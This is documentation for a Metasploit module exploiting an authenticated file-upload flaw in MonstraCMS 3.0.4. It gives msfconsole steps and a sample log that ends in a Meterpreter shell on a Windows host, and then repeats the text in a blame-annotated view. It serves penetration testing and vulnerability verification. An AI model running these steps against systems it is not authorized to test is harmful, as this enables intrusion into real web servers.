documentation/modules/exploit/multi/http/monstra_fileupload_exec.md

## Description
MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to remote command execution on the remote server. An attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.
This module was tested against MonstraCMS 3.0.4.
Additional information and vulnerabilities can be viewed on Exploit-DB [43348](https://www.exploit-db.com/exploits/43348/).

## Vulnerable Application 
Available at [Exploit-DB](https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip)

### Vulnerable Application Installation Setup
 1. Download Application : `https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
 2. Extract : `23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
 3. Move In WebDirectory : `C:\xampp\htdocs\`
 4. Now Visit : http://localhost/

## Verification Steps

 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/multi/http/monstra_fileupload_exec`
 4. Do: `set rport <port>`
 5. Do: `set rhost <ip>`
 6. Do: `set targeturi monstra`
 7. Do: `set username USERNAME`
 8. Do: `set password PASSWORD`
 9. Do: `check`
```
[*] Monstra CMS: 3.0.4
[+] 192.168.0.101:80 The target is vulnerable.
```
 10. Do: `set lport <port>`
 11. Do: `set lhost <ip>`
 12. Do: `exploit`
 13. You should get a shell.


## Scenarios
### Monstra CMS on Windows Target
```                                                                                                                                    
msf exploit(multi/http/monstra_fileupload_exec) > check 

[*] Monstra CMS: 3.0.4
[+] 192.168.0.101:80 The target is vulnerable.
msf exploit(multi/http/monstra_fileupload_exec) > exploit 

[*] Started bind handler
[*] Trying to Login ......
[+] Authentication successful : [ editor : editor ]
[+] CSRF-Token for File Upload : 2a67a7995c15c69a158d897f517e3aff2e3a4ae9
[*] Trying to upload file with malicious Content....
[*] Executing Payload 
[*] Sending stage (37775 bytes) to 192.168.0.101
[*] Meterpreter session 1 opened (10.0.2.15:45689 -> 192.168.0.101:4444) at 2018-06-30 12:39:53 +0530
[+] Deleted TSPfeLYdMP.PHP

meterpreter > sysinfo 
Computer    : 114619-T470P
OS          : Windows NT 114619-T470P 10.0 build 16299 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > 
```
monstra_fileupload_exec doc 2018-06-30 11:52:43 +05:30			`## Description`
modified capitalization and wording 2018-07-10 14:12:02 -05:00			`MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to remote command execution on the remote server. An attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.`
monstra_fileupload_exec doc 2018-06-30 11:52:43 +05:30			`This module was tested against MonstraCMS 3.0.4.`
			`Additional information and vulnerabilities can be viewed on Exploit-DB [43348](https://www.exploit-db.com/exploits/43348/).`

			`## Vulnerable Application`
			`Available at [Exploit-DB](https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip)`

modified capitalization and wording 2018-07-10 14:12:02 -05:00			`### Vulnerable Application Installation Setup`
monstra_fileupload_exec doc 2018-06-30 11:52:43 +05:30			1. Download Application : `https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
			2. Extract : `23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
			3. Move In WebDirectory : `C:\xampp\htdocs\`
			`4. Now Visit : http://localhost/`

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: `use exploit/multi/http/monstra_fileupload_exec`
			4. Do: `set rport <port>`
			5. Do: `set rhost <ip>`
			6. Do: `set targeturi monstra`
Docs Update 2018-06-30 12:45:43 +05:30			7. Do: `set username USERNAME`
			8. Do: `set password PASSWORD`
monstra_fileupload_exec doc 2018-06-30 11:52:43 +05:30			9. Do: `check`
			```
Docs Update 2018-06-30 12:45:43 +05:30			`[*] Monstra CMS: 3.0.4`
			`[+] 192.168.0.101:80 The target is vulnerable.`
monstra_fileupload_exec doc 2018-06-30 11:52:43 +05:30			```
			10. Do: `set lport <port>`
			11. Do: `set lhost <ip>`
			12. Do: `exploit`
			`13. You should get a shell.`


			`## Scenarios`
			`### Monstra CMS on Windows Target`
			```
Docs Update 2018-06-30 12:45:43 +05:30			`msf exploit(multi/http/monstra_fileupload_exec) > check`

			`[*] Monstra CMS: 3.0.4`
			`[+] 192.168.0.101:80 The target is vulnerable.`
			`msf exploit(multi/http/monstra_fileupload_exec) > exploit`

			`[*] Started bind handler`
			`[*] Trying to Login ......`
			`[+] Authentication successful : [ editor : editor ]`
			`[+] CSRF-Token for File Upload : 2a67a7995c15c69a158d897f517e3aff2e3a4ae9`
			`[*] Trying to upload file with malicious Content....`
			`[*] Executing Payload`
			`[*] Sending stage (37775 bytes) to 192.168.0.101`
			`[*] Meterpreter session 1 opened (10.0.2.15:45689 -> 192.168.0.101:4444) at 2018-06-30 12:39:53 +0530`
			`[+] Deleted TSPfeLYdMP.PHP`

			`meterpreter > sysinfo`
			`Computer : 114619-T470P`
			`OS : Windows NT 114619-T470P 10.0 build 16299 (Windows 10) AMD64`
			`Meterpreter : php/windows`
			`meterpreter >`
monstra_fileupload_exec doc 2018-06-30 11:52:43 +05:30			```